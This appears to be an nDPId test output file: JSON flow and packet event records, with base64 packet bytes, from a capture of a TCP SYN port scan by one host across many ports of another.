+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/3IAACkGIACsEAAIQA2GNIzTH5rdU4MZAAAAAGACCAAQ8gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsWowAADkGtOasEAAIQA2GNIzTA+ndU4MZAAAAAGACCAAsowAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsPj8AADgG0jOsEAAIQA2GNIzTCDTdU4MZAAAAAGACBAAsWAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsHb4AAC0G\/bSsEAAIQA2GNIzTBfHdU4MZAAAAAGACCAAqmwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAst4YAADUGW+ysEAAIQA2GNIzTBDrdU4MZAAAAAGACCAAsUgAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAseH0AACUGqvWsEAAIQA2GNIzTAATdU4MZAAAAAGACCAAwiAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAs5QAAACYGPXKsEAAIQA2GNIzTC5fdU4MZAAAAAGACDAAg9QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsG8IAADcG9bCsEAAIQA2GNIzTH2rdU4MZAAAAAGACEAAJIgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsGWQAADcG+A6sEAAIQA2GNIzTFw3dU4MZAAAAAGACEAARfwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsmC0AACkGh0WsEAAIQA2GNIzTAeHdU4MZAAAAAGACCAAuqwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsqo0AADAGbeWsEAAIQA2GNIzTBCrdU4MZAAAAAGACBAAwYgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsj2EAADAGiRGsEAAIQA2GNIzTFKDdU4MZAAAAAGACBAAf7AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsTgwAADAGymasEAAIQA2GNIzSHmLdUoMYAAAAAGACBAAWLQAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAspWAAADAGcxKsEAAIQA2GNIzSA9vdUoMYAAAAAGACBAAwtAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsErEAADIGA8KsEAAIQA2GNIzSFi\/dUoMYAAAAAGACDAAWYAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsop0AADoGa9WsEAAIQA2GNIzSH\/TdUoMYAAAAAGACDAAMmwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAslLkAADMGgLmsEAAIQA2GNIzSELfdUoMYAAAAAGACEAAX2AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsXlUAACcGwx2sEAAIQA2GNIzSOGndUoMYAAAAAGACEADwJQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsVpgAAC4Gw9qsEAAIQA2GNIzSrZvdUoMYAAAAAGACDAB+8wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsXgQAADAGum6sEAAIQA2GNIzSJZLdUoMYAAAAAGACBAAO\/QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsjFAAADcGhSKsEAAIQA2GNIzSCP3dUoMYAAAAAGACEAAfkgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsL8IAADcG4bCsEAAIQA2GNIzSxnDdUoMYAAAAAGACEABiHgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsMfQAADUG4X6sEAAIQA2GNIzSH0rdUoMYAAAAAGACCAARRQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAs20cAACgGRSusEAAIQA2GNIzTJqzdU4MZAAAAAGACBAAN4AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 